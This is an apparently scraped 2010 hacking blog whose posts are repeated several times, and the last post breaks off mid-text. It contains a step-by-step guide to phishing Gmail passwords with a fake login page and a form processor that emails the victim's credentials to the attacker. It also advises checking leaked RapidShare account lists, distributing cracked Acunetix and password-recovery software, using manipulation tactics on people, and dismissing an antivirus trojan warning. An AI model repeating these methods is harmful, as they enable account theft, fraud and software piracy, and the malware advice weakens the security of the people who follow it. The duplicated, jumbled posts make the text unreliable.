///////////////////////////////////////////
How to Track Your Stolen Laptop
My friend recently bought a Toshiba laptop, but it was stolen within a
couple days. The good thing is that i had installed a tracing software on
his laptop the very same day he bought it, and he had no troubles finding
it. This can happen to anyone which is using laptop, so having a tracing
software installed on your laptop is not a bad idea.
Here i am showing you a free laptop tracing software called Prey.
Prey lets you keep track of your phone or laptop at all times, and will
help you find it if it ever gets lost or stolen. It's lightweight, open
source software, and free for anyone to use. And it just works.
How it Works?
Basically you install a tiny agent in your PC or phone, which silently
waits for a remote signal to wake up and work its magic.
This signal is sent either from the Internet or through an SMS message, and
allows you to gather information regarding the device's location, hardware
and network status, and optionally trigger specific actions on it.
Notice: This file is Trojan as detected by some antivirus, but the thing is
every such files are called trojan, as the process is to Track your system
and view your systems reports. But be secure, this file is not harmful for
your system or for your personal information. This software is made By PRey
Project Company, and they take responsibility of it.
How to Download and Install Prey?
1. First of all download Prey project file from here.
2. After Downloading, Install the File and than
- They will ask for either standalone and +control panel.
- Go for +control panel, and than Click For New User.
- Give Your Name, Your Email and select Password to login the site.
E.g, Name :- John Smith
Email:-johnsmith@gmail.com
Password:-123456 (any Password that you choose) for Entering the site, and
than press ok.
- You will get Email from prey project, just activate your account there,
and click your device and do the following settings:
If you "on" any of the above settings than be sure to remember password
of "lock pass". It will show as the tym you make it on. Just below the lock
it will be written pass, and when alert is on the message will display
whenever you login, "this laptop is stolen ...."-lol
So these were all steps now you can install and get secure. Now if its get
stolen than you can track back
Remember: This still has demerit E.g, If theif formats your system
completly than its no way possible to get back than to ask for police, and
they don't track laptop normally, until the stolen system is related with
some serious case.
Thursday, October 21, 2010
" How to Hack RapidShare Premium Accounts using RapidShare Hacking Software "
///////////////////////////////////////////
How to Hack RapidShare Premium Accounts using RapidShare Hacking Software
If you search for free rapidshare premium account & password on google I am
sure you will find many websites and blogs offering premium account with
passwords. But the problem arises if the premium rapidshare accounts we
find so overwhelming and would definitely be very time consuming to
manually check them one by one to find any working premium rapidshare
account. Of course you prefer to do something else than that! Therefore
automatically check for valid premium rapidshare accounts tool is the
answer for saving our times and energy. Here’s Rapidshare Plus ACC –
Rapidshare Premium Account Checker developed by aline 333.
Rapidshare Plus ACC will automatically check for the working accounts, so
all you got to do is get yourself a list of Rapidshare premium account
username and passwords. This is best way to get yourself a working account
out of huge lists and it can save a lot of time for you too.
Search google or some hacking forums to find great list of rapidshare
account names and passwords, and you can start with your job ;)
Using Rapidshare Plus ACC, you can test all the usernames and passwords of
Rapidshare and will list the working accounts in a separate window. The
accounts can be inputted with a comma or a new line between 2 accounts.
Download RapidShare Plus ACC
How to Hack RapidShare Premium Accounts using RapidShare Hacking Software
If you search for free rapidshare premium account & password on google I am
sure you will find many websites and blogs offering premium account with
passwords. But the problem arises if the premium rapidshare accounts we
find so overwhelming and would definitely be very time consuming to
manually check them one by one to find any working premium rapidshare
account. Of course you prefer to do something else than that! Therefore
automatically check for valid premium rapidshare accounts tool is the
answer for saving our times and energy. Here’s Rapidshare Plus ACC –
Rapidshare Premium Account Checker developed by aline 333.
Rapidshare Plus ACC will automatically check for the working accounts, so
all you got to do is get yourself a list of Rapidshare premium account
username and passwords. This is best way to get yourself a working account
out of huge lists and it can save a lot of time for you too.
Search google or some hacking forums to find great list of rapidshare
account names and passwords, and you can start with your job ;)
Using Rapidshare Plus ACC, you can test all the usernames and passwords of
Rapidshare and will list the working accounts in a separate window. The
accounts can be inputted with a comma or a new line between 2 accounts.
Download RapidShare Plus ACC
" How to Unlock Windows 7 Hidden Themes "
///////////////////////////////////////////
How to Unlock Windows 7 Hidden Themes
Windows 7 hidden themes, well, yes! windows 7 has some hidden themes which
has unknown to many. Generally windows 7 has default 5 themes but Windows 7
beta 1 build 7000 onwards has several hidden and locked themes, which has
been provided for regional countries such as Australia, Canada, Great
Britain, United States and South Africa. Well for revealing those regional
themes you have to unlock it. So follow the guidelines from bellow.
How to Unlock Windows 7 Hidden Themes
Method 1 -
Unhide the Windows 7 System and Protected Operating System files from
Windows explorer -> Organize -> Folder and Search Options -> view tab
And navigate to C:\Windows\Globalization\MCT , you will see 5 folders.
Namely MCT-AU for an Australian theme, MCT-CA for a Canadian theme, MCT-GB
for a British theme, MCT-US for an American theme and MCT-ZA for a South
African theme
Open the Theme folder in the selected region folder
Now select the .theme file to use it
NOTE Once you have select the theme, the Windows 7 will save it so that
you will be able to change or select this theme again from within the
normal Personalization window location
Method 2 -
Go to \Windows\winsxs Directory
Search for *.theme
Now double click themes with name in the format of XX to apply and save the
theme
Method 3 -
Open Notepad and copy the following code
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Themes\InstalledThemes\MCT]
“%windir%\\Globalization\\MCT\\MCT-AU\\Theme\\AU.theme”=””
“%windir%\\Globalization\\MCT\\MCT-CA\\Theme\\CA.theme”=””
“%windir%\\Globalization\\MCT\\MCT-GB\\Theme\\GB.theme”=””
“%windir%\\Globalization\\MCT\\MCT-US\\Theme\\US.theme”=””
“%windir%\\Globalization\\MCT\\MCT-ZA\\Theme\\ZA.theme”=””
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Wallpapers\KnownFolders\Windows
Wallpapers\MergeFolders]
“%windir%\\Globalization\\MCT\\MCT-AU\\Wallpaper”=””
“%windir%\\Globalization\\MCT\\MCT-CA\\Wallpaper”=””
“%windir%\\Globalization\\MCT\\MCT-GB\\Wallpaper”=””
“%windir%\\Globalization\\MCT\\MCT-US\\Wallpaper”=””
“%windir%\\Globalization\\MCT\\MCT-ZA\\Wallpaper”=””
Now save it as allregional.reg on desktop
And simply double click on it (allregional.reg)
Well, that is it, Now you can access all Windows 7 Hidden & Locked Themes
via right clicking on desktop and personalize settings
How to Unlock Windows 7 Hidden Themes
Windows 7 hidden themes, well, yes! windows 7 has some hidden themes which
has unknown to many. Generally windows 7 has default 5 themes but Windows 7
beta 1 build 7000 onwards has several hidden and locked themes, which has
been provided for regional countries such as Australia, Canada, Great
Britain, United States and South Africa. Well for revealing those regional
themes you have to unlock it. So follow the guidelines from bellow.
How to Unlock Windows 7 Hidden Themes
Method 1 -
Unhide the Windows 7 System and Protected Operating System files from
Windows explorer -> Organize -> Folder and Search Options -> view tab
And navigate to C:\Windows\Globalization\MCT , you will see 5 folders.
Namely MCT-AU for an Australian theme, MCT-CA for a Canadian theme, MCT-GB
for a British theme, MCT-US for an American theme and MCT-ZA for a South
African theme
Open the Theme folder in the selected region folder
Now select the .theme file to use it
NOTE Once you have select the theme, the Windows 7 will save it so that
you will be able to change or select this theme again from within the
normal Personalization window location
Method 2 -
Go to \Windows\winsxs Directory
Search for *.theme
Now double click themes with name in the format of XX to apply and save the
theme
Method 3 -
Open Notepad and copy the following code
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Themes\InstalledThemes\MCT]
“%windir%\\Globalization\\MCT\\MCT-AU\\Theme\\AU.theme”=””
“%windir%\\Globalization\\MCT\\MCT-CA\\Theme\\CA.theme”=””
“%windir%\\Globalization\\MCT\\MCT-GB\\Theme\\GB.theme”=””
“%windir%\\Globalization\\MCT\\MCT-US\\Theme\\US.theme”=””
“%windir%\\Globalization\\MCT\\MCT-ZA\\Theme\\ZA.theme”=””
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Wallpapers\KnownFolders\Windows
Wallpapers\MergeFolders]
“%windir%\\Globalization\\MCT\\MCT-AU\\Wallpaper”=””
“%windir%\\Globalization\\MCT\\MCT-CA\\Wallpaper”=””
“%windir%\\Globalization\\MCT\\MCT-GB\\Wallpaper”=””
“%windir%\\Globalization\\MCT\\MCT-US\\Wallpaper”=””
“%windir%\\Globalization\\MCT\\MCT-ZA\\Wallpaper”=””
Now save it as allregional.reg on desktop
And simply double click on it (allregional.reg)
Well, that is it, Now you can access all Windows 7 Hidden & Locked Themes
via right clicking on desktop and personalize settings
" Get Web Scanner for Hackers Worth 3195$ for Free "
///////////////////////////////////////////
Get Web Scanner for Hackers Worth 3195$ for Free
Acunetix - The webmasters best friend, or worst enemy?
As many as 70% of web sites have vulnerabilities that could lead to the
theft of sensitive corporate data such as credit card information and
customer lists.
Hackers are concentrating their efforts on web-based applications -
shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access
to backend corporate databases.
Firewalls, SSL and locked-down servers are futile against web application
hacking!
Web application attacks, launched on port 80/443, go straight through the
firewall, past operating system and network level security, and right in to
the heart of your application and corporate data. Tailor-made web
applications are often insufficiently tested, have undiscovered
vulnerabilities and are therefore easy prey for hackers.
Acunetix - a world-wide leader in web application security
Acunetix has pioneered the web application security scanning technology:
Its engineers have focused on web security as early as 1997 and developed
an engineering lead in web site analysis and vulnerability detection.
Acunetix Web Vulnerability Scanner includes many innovative features:
AcuSensor TechnologyAn automatic client script analyzer allowing for
security testing of Ajax and Web 2.0 applicationsIndustries' most advanced
and in-depth SQL injection and Cross site scripting testingAdvanced
penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
Visual macro recorder makes testing web forms and password protected areas
easyExtensive reporting facilities including VISA PCI compliance
reportsMulti-threaded and lightning fast scanner crawls hundreds of
thousands of pages with easeIntelligent crawler detects web server type and
application languageAcunetix crawls and analyzes websites including flash
content, SOAP and AJAXPort scans a web server and runs security checks
against network services running on the server
Acunetix can be used to fully determine if a website is vulnerable in any
way, and it rates the security risk level. It can scan for all the attacks
mentioned above to see what its vulnerable, or find allot of useful info
about the site as given.
This tool can be used by both white hats and black hats. It worths 3195$
for 1 year!!! I am giving it for free and unlimited time. That's a hell a
lot of money.
Install Notes:
Install acunetix 6.5.Replace original files with crack folder content.Start
wvs.exe and your done.Download Acunetix (Clean copy, tested by me)
Get Web Scanner for Hackers Worth 3195$ for Free
Acunetix - The webmasters best friend, or worst enemy?
As many as 70% of web sites have vulnerabilities that could lead to the
theft of sensitive corporate data such as credit card information and
customer lists.
Hackers are concentrating their efforts on web-based applications -
shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access
to backend corporate databases.
Firewalls, SSL and locked-down servers are futile against web application
hacking!
Web application attacks, launched on port 80/443, go straight through the
firewall, past operating system and network level security, and right in to
the heart of your application and corporate data. Tailor-made web
applications are often insufficiently tested, have undiscovered
vulnerabilities and are therefore easy prey for hackers.
Acunetix - a world-wide leader in web application security
Acunetix has pioneered the web application security scanning technology:
Its engineers have focused on web security as early as 1997 and developed
an engineering lead in web site analysis and vulnerability detection.
Acunetix Web Vulnerability Scanner includes many innovative features:
AcuSensor TechnologyAn automatic client script analyzer allowing for
security testing of Ajax and Web 2.0 applicationsIndustries' most advanced
and in-depth SQL injection and Cross site scripting testingAdvanced
penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
Visual macro recorder makes testing web forms and password protected areas
easyExtensive reporting facilities including VISA PCI compliance
reportsMulti-threaded and lightning fast scanner crawls hundreds of
thousands of pages with easeIntelligent crawler detects web server type and
application languageAcunetix crawls and analyzes websites including flash
content, SOAP and AJAXPort scans a web server and runs security checks
against network services running on the server
Acunetix can be used to fully determine if a website is vulnerable in any
way, and it rates the security risk level. It can scan for all the attacks
mentioned above to see what its vulnerable, or find allot of useful info
about the site as given.
This tool can be used by both white hats and black hats. It worths 3195$
for 1 year!!! I am giving it for free and unlimited time. That's a hell a
lot of money.
Install Notes:
Install acunetix 6.5.Replace original files with crack folder content.Start
wvs.exe and your done.Download Acunetix (Clean copy, tested by me)
" Get Web Scanner for Hackers Worth 3195$ for Free "
///////////////////////////////////////////
Get Web Scanner for Hackers Worth 3195$ for Free
Acunetix - The webmasters best friend, or worst enemy?
As many as 70% of web sites have vulnerabilities that could lead to the
theft of sensitive corporate data such as credit card information and
customer lists.
Hackers are concentrating their efforts on web-based applications -
shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access
to backend corporate databases.
Firewalls, SSL and locked-down servers are futile against web application
hacking!
Web application attacks, launched on port 80/443, go straight through the
firewall, past operating system and network level security, and right in to
the heart of your application and corporate data. Tailor-made web
applications are often insufficiently tested, have undiscovered
vulnerabilities and are therefore easy prey for hackers.
Acunetix - a world-wide leader in web application security
Acunetix has pioneered the web application security scanning technology:
Its engineers have focused on web security as early as 1997 and developed
an engineering lead in web site analysis and vulnerability detection.
Acunetix Web Vulnerability Scanner includes many innovative features:
AcuSensor TechnologyAn automatic client script analyzer allowing for
security testing of Ajax and Web 2.0 applicationsIndustries' most advanced
and in-depth SQL injection and Cross site scripting testingAdvanced
penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
Visual macro recorder makes testing web forms and password protected areas
easyExtensive reporting facilities including VISA PCI compliance
reportsMulti-threaded and lightning fast scanner crawls hundreds of
thousands of pages with easeIntelligent crawler detects web server type and
application languageAcunetix crawls and analyzes websites including flash
content, SOAP and AJAXPort scans a web server and runs security checks
against network services running on the server
Acunetix can be used to fully determine if a website is vulnerable in any
way, and it rates the security risk level. It can scan for all the attacks
mentioned above to see what its vulnerable, or find allot of useful info
about the site as given.
This tool can be used by both white hats and black hats. It worths 3195$
for 1 year!!! I am giving it for free and unlimited time. That's a hell a
lot of money.
Install Notes:
Install acunetix 6.5.Replace original files with crack folder content.Start
wvs.exe and your done.Download Acunetix (Clean copy, tested by me)
Get Web Scanner for Hackers Worth 3195$ for Free
Acunetix - The webmasters best friend, or worst enemy?
As many as 70% of web sites have vulnerabilities that could lead to the
theft of sensitive corporate data such as credit card information and
customer lists.
Hackers are concentrating their efforts on web-based applications -
shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access
to backend corporate databases.
Firewalls, SSL and locked-down servers are futile against web application
hacking!
Web application attacks, launched on port 80/443, go straight through the
firewall, past operating system and network level security, and right in to
the heart of your application and corporate data. Tailor-made web
applications are often insufficiently tested, have undiscovered
vulnerabilities and are therefore easy prey for hackers.
Acunetix - a world-wide leader in web application security
Acunetix has pioneered the web application security scanning technology:
Its engineers have focused on web security as early as 1997 and developed
an engineering lead in web site analysis and vulnerability detection.
Acunetix Web Vulnerability Scanner includes many innovative features:
AcuSensor TechnologyAn automatic client script analyzer allowing for
security testing of Ajax and Web 2.0 applicationsIndustries' most advanced
and in-depth SQL injection and Cross site scripting testingAdvanced
penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
Visual macro recorder makes testing web forms and password protected areas
easyExtensive reporting facilities including VISA PCI compliance
reportsMulti-threaded and lightning fast scanner crawls hundreds of
thousands of pages with easeIntelligent crawler detects web server type and
application languageAcunetix crawls and analyzes websites including flash
content, SOAP and AJAXPort scans a web server and runs security checks
against network services running on the server
Acunetix can be used to fully determine if a website is vulnerable in any
way, and it rates the security risk level. It can scan for all the attacks
mentioned above to see what its vulnerable, or find allot of useful info
about the site as given.
This tool can be used by both white hats and black hats. It worths 3195$
for 1 year!!! I am giving it for free and unlimited time. That's a hell a
lot of money.
Install Notes:
Install acunetix 6.5.Replace original files with crack folder content.Start
wvs.exe and your done.Download Acunetix (Clean copy, tested by me)
Sunday, October 10, 2010
"Free WINRAR password recovery"
///////////////////////////////////////////
Free WinRar Password Recovery
Who doesn’t like free stuff! I know you do, that’s why I’m going to give
you this awesome Zip password Recovery Magic v6.1.1.169, that can easily
crack zip passwords, it provides brute-force and dictionary cracking
methods, you can pause and resume recovery job easily. All you need to
recover your password is just to add your file to the operation window.
Free Download Zip Password Recovery Magic
How to install Zip password Recovery Magic v6.1.1.169 ?
1. Extract RAR.PW.Remover to your computer and install as normal
2. Go to the crack folder and copy the File Named “urpwdr11rc16.exe” , then
go to the hard drive where You Installed the Program , default folder is
Program Files/Intelore” Folder/RAR-PR. Then paste the copied crack file
into this directory and accept all permission requests!
Free WinRar Password Recovery
Who doesn’t like free stuff! I know you do, that’s why I’m going to give
you this awesome Zip password Recovery Magic v6.1.1.169, that can easily
crack zip passwords, it provides brute-force and dictionary cracking
methods, you can pause and resume recovery job easily. All you need to
recover your password is just to add your file to the operation window.
Free Download Zip Password Recovery Magic
How to install Zip password Recovery Magic v6.1.1.169 ?
1. Extract RAR.PW.Remover to your computer and install as normal
2. Go to the crack folder and copy the File Named “urpwdr11rc16.exe” , then
go to the hard drive where You Installed the Program , default folder is
Program Files/Intelore” Folder/RAR-PR. Then paste the copied crack file
into this directory and accept all permission requests!
"Great social engineering technique for hackers"
///////////////////////////////////////////
Great Social Engineering Techniques for Hackers - Get People to Do What You
Want
I am having this "hacking/security" blog for more then a year now. Beside
cyber security, ethical hacking and technology, I am also interested in
some social/natural science fields, like philosophy, and psychology. In
this article I would share some manipulation techniques that i know about
from my previous knowledge, and experience.Now these techniques can be
used in many different ways and I will leave it up to the individual to
decide what those ways are. Please realize this isn't mind control and it
will not make you able to convince people to do extreme things but maybe
change a simple idea in someones mind and make them favor your ideas more.
This methods can come in handy for many hackers. Lets start:
Sympathy/Empathy - Believe it or not making someone feel sorry for you can
wield great results. You can convince people to do many things with just a
simple guilt trip. Examples include a family members death, recent job
loss, an scarring event such as being robbed at gunpoint, losing money, or
even a simple bad day. Using this can make somebody not only do what you
want but they won't feel regret over doing it.
Split Personalities - No this does not mean be nice one second and mean the
next. This tactic is great for pressuring someone into something from two
fronts. The basic idea of this is to act as two people. This cannot be done
in person and is best done online. An example of this methods usefulness is
to maybe convince someone to sell something at a cheaper price by having
one side of you as friend saying great deal while the other says that they
can barely do this and they're unsure if they should. The trick here is to
play opposites in a way that pushes the person you want to trick into doing
something they wouldn't otherwise do.
If you don't then someone else will - Nothing puts more pressure on someone
then giving them the idea of loss if they do not take advantage of the
situation. This can be great for selling items. The general idea behind
this is to make the person feel as if they will lose a once in a lifetime
opportunity if they give up on this offer. You can even use the Split
Personalities in mixture with this.
Being Over Understanding - Nothing softens the heart than making a person
feel that they're doing a good job. If a situation comes where you have
been wrong pretending to be completely understanding can go a long ways.
This can general make the person feel more entitled to give you a better
experience.
That is all I can come with at the current moment. Please throw suggestion
and feedback. This is technically Social Engineering, an art of getting
people to tell you stuff that they usually wouldn’t disclose, through the
use of words and your appearance. I personally hate these type of people. A
good Social engineerer (or as I love to call these types of people,
“Bullshit artists”), can make people believe nearly anything. It is always
a good idea to be aware of people who you don’t know, but it is also good
practice to watch people you DO know. Don’t be getting paranoid about
things, because that isn’t what i mean, but Social Engineering is the
EASIEST way to hack anything. Hope this helps people gain the upper hand in
a poorly setup situation.
Great Social Engineering Techniques for Hackers - Get People to Do What You
Want
I am having this "hacking/security" blog for more then a year now. Beside
cyber security, ethical hacking and technology, I am also interested in
some social/natural science fields, like philosophy, and psychology. In
this article I would share some manipulation techniques that i know about
from my previous knowledge, and experience.Now these techniques can be
used in many different ways and I will leave it up to the individual to
decide what those ways are. Please realize this isn't mind control and it
will not make you able to convince people to do extreme things but maybe
change a simple idea in someones mind and make them favor your ideas more.
This methods can come in handy for many hackers. Lets start:
Sympathy/Empathy - Believe it or not making someone feel sorry for you can
wield great results. You can convince people to do many things with just a
simple guilt trip. Examples include a family members death, recent job
loss, an scarring event such as being robbed at gunpoint, losing money, or
even a simple bad day. Using this can make somebody not only do what you
want but they won't feel regret over doing it.
Split Personalities - No this does not mean be nice one second and mean the
next. This tactic is great for pressuring someone into something from two
fronts. The basic idea of this is to act as two people. This cannot be done
in person and is best done online. An example of this methods usefulness is
to maybe convince someone to sell something at a cheaper price by having
one side of you as friend saying great deal while the other says that they
can barely do this and they're unsure if they should. The trick here is to
play opposites in a way that pushes the person you want to trick into doing
something they wouldn't otherwise do.
If you don't then someone else will - Nothing puts more pressure on someone
then giving them the idea of loss if they do not take advantage of the
situation. This can be great for selling items. The general idea behind
this is to make the person feel as if they will lose a once in a lifetime
opportunity if they give up on this offer. You can even use the Split
Personalities in mixture with this.
Being Over Understanding - Nothing softens the heart than making a person
feel that they're doing a good job. If a situation comes where you have
been wrong pretending to be completely understanding can go a long ways.
This can general make the person feel more entitled to give you a better
experience.
That is all I can come with at the current moment. Please throw suggestion
and feedback. This is technically Social Engineering, an art of getting
people to tell you stuff that they usually wouldn’t disclose, through the
use of words and your appearance. I personally hate these type of people. A
good Social engineerer (or as I love to call these types of people,
“Bullshit artists”), can make people believe nearly anything. It is always
a good idea to be aware of people who you don’t know, but it is also good
practice to watch people you DO know. Don’t be getting paranoid about
things, because that isn’t what i mean, but Social Engineering is the
EASIEST way to hack anything. Hope this helps people gain the upper hand in
a poorly setup situation.
"MAKE MONEY WITHOUT DOING SURVEYS"
///////////////////////////////////////////
How to Download from ShitCash Websites Without Doing Surveys
This little trick will help you to download from "shitcash" or any other
downloading site without doing surveys. Now you can skip ads with some
mouse click... Yesterday i tried to download something from a "shitcash"
website but it was so annoying. Surveys, pop-up ads... I found a working
trick to bypass ShitCash surveys. Here are the steps:
REQUIREMENTS:
FireFox [Download]
GreaseMonkey [Download]
This script: Intelligent Form FillerSo it works pretty easy, actually:
You just open your ShitCash page.Choose an offer.Press Ctrl + Shift + F and
its all filled in with random stuff.
*In some cases turn OFF GraseMonkey by clicking the little monkey, if
submitted turn ON again.
4. Now, submit the form, and your download unlocks most of the time.
Optional 5. If doesn't, clean your cookies, I recommend using this add-on:
Click&Clean, and start at step 1.
Have fun downloading from ShitCash websites Without doing surveys. I hope
this trick will help some readers.
How to Download from ShitCash Websites Without Doing Surveys
This little trick will help you to download from "shitcash" or any other
downloading site without doing surveys. Now you can skip ads with some
mouse click... Yesterday i tried to download something from a "shitcash"
website but it was so annoying. Surveys, pop-up ads... I found a working
trick to bypass ShitCash surveys. Here are the steps:
REQUIREMENTS:
FireFox [Download]
GreaseMonkey [Download]
This script: Intelligent Form FillerSo it works pretty easy, actually:
You just open your ShitCash page.Choose an offer.Press Ctrl + Shift + F and
its all filled in with random stuff.
*In some cases turn OFF GraseMonkey by clicking the little monkey, if
submitted turn ON again.
4. Now, submit the form, and your download unlocks most of the time.
Optional 5. If doesn't, clean your cookies, I recommend using this add-on:
Click&Clean, and start at step 1.
Have fun downloading from ShitCash websites Without doing surveys. I hope
this trick will help some readers.
Wednesday, October 6, 2010
"HACK GMAIL ACCOUNT"
///////////////////////////////////////////
How to Crack Gmail Account Password - Email Hacking
Here is the most effective technique for cracking GMail Accounts Passwords.
This method uses 'Social Engineering' rather than 'Phishing'.
Follow the steps as given below:
Success Rate: 90%
Step 1: Create your own fake gmail login form using HTML, which may look
like one as shown below:
The HTML code for above login screen created by me is given here.
Step 2: We require a form processor to process this fake login form, i.e.
to store the username and password entered by the victim.
The username and password entered by victim can either be stored in
database or send directly to the predefined e-mail address.
This can be done in two ways:
1. Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You
have to register with www.formmail.com and configure your fake gmail login
form to be processed by formmail.com . The configuration is different for
each formmail account. Which may be something like this.
2. If you are having your own domain hosted on some server; knowing the
basics of ASP for processing HTML forms, you can create your own form
processor in ASP (eg. 'login.asp' page) for above given fake gmail login
form. Here you should only put both 'gmail.html' and 'login.asp' files to
your server.
Step 3: Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form
Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's
e-mail address, hoping that the victim gets fooled into entering the
account username and password and click on 'Move' button.
Note: You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending
fake login form to victim.
As soon as victim click on 'Move' button he/she get redirected to
predefined webpage (eg. http://www.gmail.com), while his/her 'username'
and 'password' get emailed to you by formmail.com .
That's It...! Happy Gmail Hacking ;)
How to Crack Gmail Account Password - Email Hacking
Here is the most effective technique for cracking GMail Accounts Passwords.
This method uses 'Social Engineering' rather than 'Phishing'.
Follow the steps as given below:
Success Rate: 90%
Step 1: Create your own fake gmail login form using HTML, which may look
like one as shown below:
The HTML code for above login screen created by me is given here.
Step 2: We require a form processor to process this fake login form, i.e.
to store the username and password entered by the victim.
The username and password entered by victim can either be stored in
database or send directly to the predefined e-mail address.
This can be done in two ways:
1. Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You
have to register with www.formmail.com and configure your fake gmail login
form to be processed by formmail.com . The configuration is different for
each formmail account. Which may be something like this.
2. If you are having your own domain hosted on some server; knowing the
basics of ASP for processing HTML forms, you can create your own form
processor in ASP (eg. 'login.asp' page) for above given fake gmail login
form. Here you should only put both 'gmail.html' and 'login.asp' files to
your server.
Step 3: Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form
Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's
e-mail address, hoping that the victim gets fooled into entering the
account username and password and click on 'Move' button.
Note: You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending
fake login form to victim.
As soon as victim click on 'Move' button he/she get redirected to
predefined webpage (eg. http://www.gmail.com), while his/her 'username'
and 'password' get emailed to you by formmail.com .
That's It...! Happy Gmail Hacking ;)
"KNOW MORE ABOUT NETWORK HACKINGS"
///////////////////////////////////////////
Know More about Network Hacking (Port Scanning)
System administrators are constantly being advised to check their systems
for open ports and services that might be running that are either
unintended or unnecessary. In some cases, the services might be Trojans
just waiting to be exploited.
Port Scanning: Port scanning is carried out to determine a list of open
ports on the remote host that have certain services or daemons running. In
port scanning, the attacker connects to various TCP and UDP ports and tries
to determine which ports are in listening mode.
1. TCP Ports Scanning: Almost all port scans are based on the client
sending a packet containing a particular flag to the target port of the
remote system to determine whether the port is open. Following table lists
the type of flags a TCP packet header can contain.
A typical TCP/IP three way handshake can be described as follows:
The client sends a SYN packet to the server.The server replies with a SYN
packet and acknowledges the client's SYN packet by sending an ACK
packet.The client acknowledges the SYN sent by the server.
Different techniques of TCP port scanning are:
TCP connect port scanningTCP SYN scanning (half open scanning)SYN/ACK
scanningTCP FIN scanningTCP NULL scanningTCP Xmas tree scanning
2. UDP Ports Scanning: In UDP port scanning, aUDP packet is sent to each
port on the target host one by one.
If the remote port is closed, then the server replies with a Port
Unreachable ICMP error message. If the port is open then no such error
message is generated.
3. FTP Bounce Port Scanning: The FTP bounce port scanning technique was
discovered by Hobbit. He revealed a very interesting loophole in the FTP
protocol that allowed users connected to the FTP service of a particular
system to connect to any port of another system. This loophole allows
anonymous port scanning.
Know More about Network Hacking (Port Scanning)
System administrators are constantly being advised to check their systems
for open ports and services that might be running that are either
unintended or unnecessary. In some cases, the services might be Trojans
just waiting to be exploited.
Port Scanning: Port scanning is carried out to determine a list of open
ports on the remote host that have certain services or daemons running. In
port scanning, the attacker connects to various TCP and UDP ports and tries
to determine which ports are in listening mode.
1. TCP Ports Scanning: Almost all port scans are based on the client
sending a packet containing a particular flag to the target port of the
remote system to determine whether the port is open. Following table lists
the type of flags a TCP packet header can contain.
A typical TCP/IP three way handshake can be described as follows:
The client sends a SYN packet to the server.The server replies with a SYN
packet and acknowledges the client's SYN packet by sending an ACK
packet.The client acknowledges the SYN sent by the server.
Different techniques of TCP port scanning are:
TCP connect port scanningTCP SYN scanning (half open scanning)SYN/ACK
scanningTCP FIN scanningTCP NULL scanningTCP Xmas tree scanning
2. UDP Ports Scanning: In UDP port scanning, aUDP packet is sent to each
port on the target host one by one.
If the remote port is closed, then the server replies with a Port
Unreachable ICMP error message. If the port is open then no such error
message is generated.
3. FTP Bounce Port Scanning: The FTP bounce port scanning technique was
discovered by Hobbit. He revealed a very interesting loophole in the FTP
protocol that allowed users connected to the FTP service of a particular
system to connect to any port of another system. This loophole allows
anonymous port scanning.
"KNOW MORE ABOUT NETWORK HACKINGS"
///////////////////////////////////////////
Know More about Network Hacking (Port Scanning)
System administrators are constantly being advised to check their systems
for open ports and services that might be running that are either
unintended or unnecessary. In some cases, the services might be Trojans
just waiting to be exploited.
Port Scanning: Port scanning is carried out to determine a list of open
ports on the remote host that have certain services or daemons running. In
port scanning, the attacker connects to various TCP and UDP ports and tries
to determine which ports are in listening mode.
1. TCP Ports Scanning: Almost all port scans are based on the client
sending a packet containing a particular flag to the target port of the
remote system to determine whether the port is open. Following table lists
the type of flags a TCP packet header can contain.
A typical TCP/IP three way handshake can be described as follows:
The client sends a SYN packet to the server.The server replies with a SYN
packet and acknowledges the client's SYN packet by sending an ACK
packet.The client acknowledges the SYN sent by the server.
Different techniques of TCP port scanning are:
TCP connect port scanningTCP SYN scanning (half open scanning)SYN/ACK
scanningTCP FIN scanningTCP NULL scanningTCP Xmas tree scanning
2. UDP Ports Scanning: In UDP port scanning, aUDP packet is sent to each
port on the target host one by one.
If the remote port is closed, then the server replies with a Port
Unreachable ICMP error message. If the port is open then no such error
message is generated.
3. FTP Bounce Port Scanning: The FTP bounce port scanning technique was
discovered by Hobbit. He revealed a very interesting loophole in the FTP
protocol that allowed users connected to the FTP service of a particular
system to connect to any port of another system. This loophole allows
anonymous port scanning.
Know More about Network Hacking (Port Scanning)
System administrators are constantly being advised to check their systems
for open ports and services that might be running that are either
unintended or unnecessary. In some cases, the services might be Trojans
just waiting to be exploited.
Port Scanning: Port scanning is carried out to determine a list of open
ports on the remote host that have certain services or daemons running. In
port scanning, the attacker connects to various TCP and UDP ports and tries
to determine which ports are in listening mode.
1. TCP Ports Scanning: Almost all port scans are based on the client
sending a packet containing a particular flag to the target port of the
remote system to determine whether the port is open. Following table lists
the type of flags a TCP packet header can contain.
A typical TCP/IP three way handshake can be described as follows:
The client sends a SYN packet to the server.The server replies with a SYN
packet and acknowledges the client's SYN packet by sending an ACK
packet.The client acknowledges the SYN sent by the server.
Different techniques of TCP port scanning are:
TCP connect port scanningTCP SYN scanning (half open scanning)SYN/ACK
scanningTCP FIN scanningTCP NULL scanningTCP Xmas tree scanning
2. UDP Ports Scanning: In UDP port scanning, aUDP packet is sent to each
